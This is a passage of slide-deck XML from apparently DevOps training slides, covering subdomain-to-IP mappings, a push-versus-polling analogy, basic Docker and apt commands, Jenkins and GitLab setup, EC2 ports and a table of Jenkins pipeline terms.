                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://cicd.dollorinfotech.com -&gt; 144.91.98.33:6060</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://react.dollorinfotech.com -&gt; 38.242.236.173</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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p350"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="484850"/>
            <a:ext cx="8520600" cy="40842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018"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suppose I send you a letter via SpeedPost through a post office.</a:t>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1018"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1018"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You can get the letter either 2 ways.</a:t>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1018"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. The postman will deliver the letter directly in your hand once the postman receive the letter in postoffice.</a:t>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1018"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. You can go to the postoffice every day to ask if they have received a letter for you .</a:t>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1018"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1018"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In both case you will receive letter.</a:t>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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351"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1232925"/>
            <a:ext cx="8520600" cy="2909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700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container exec -u root -it boring_curran bash</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt install build-essential</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>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9" name="Shape 2149"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2150" name="Google Shape;2150;p352"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1681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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Jenkins Steps for GitLab</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>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3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56" name="Google Shape;2156;p3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We need to create a repo on Online Repository Hub ( Github/Gitlab/Bitbucket)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/new</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p57"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2175" y="15225"/>
            <a:ext cx="9144000" cy="5128200"/>
            <a:chOff x="2175" y="15225"/>
            <a:chExt cx="9144000" cy="5128200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="299" name="Google Shape;299;p57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2175" y="15225"/>
              <a:ext cx="9144000" cy="5128200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="004A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0" name="Google Shape;300;p57"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="8442" l="5467" r="4450" t="5933"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2491763" y="189175"/>
              <a:ext cx="4164826" cy="4765150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:gr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35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5820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AWS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2162" name="Google Shape;2162;p3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ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Default all ports of ec2 instance are in closed state</a:t>
            </a:r>
            <a:endParaRPr sz="5600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2167" name="Google Shape;2167;p355"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152400" y="835350"/>
            <a:ext cx="8839199" cy="3767788"/>
            <a:chOff x="152400" y="835350"/>
            <a:chExt cx="8839199" cy="3767788"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2168" name="Google Shape;2168;p355"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="835350"/>
              <a:ext cx="8839199" cy="3767788"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2169" name="Google Shape;2169;p355"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="539525" y="2973050"/>
              <a:ext cx="1077000" cy="54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356"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402875" y="13391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320">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jenkinsfile</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2175" name="Google Shape;2175;p356"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402875" y="2090425"/>
            <a:ext cx="8520600" cy="754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3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Jenkinsfile is written using the Groovy DSL</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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9" name="Shape 2179"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2180" name="Google Shape;2180;p357"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378875" y="153625"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Jenkins Pipeline Concepts</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2181" name="Google Shape;2181;p357"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="244525" y="800525"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2288525"/>
                <a:gridCol w="6366425"/>
              </a:tblGrid>
              <a:tr h="516125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="222222"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Term</a:t>
                      </a:r>
                      <a:endParaRPr sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="222222"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="516125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pipeline</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>A pipeline is a series of code instructions that automate the process of building, testing, and delivering an application for continuous delivery</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="516125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Agent</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>agent block is used to tell Jenkins where to execute this Job</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="516125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Node</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The machine on which Jenkins runs is called a node. A node block is mainly used in scripted pipeline syntax.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="516125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Stages</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>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2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Stages block </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>contains</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> multiple stage</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="516125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
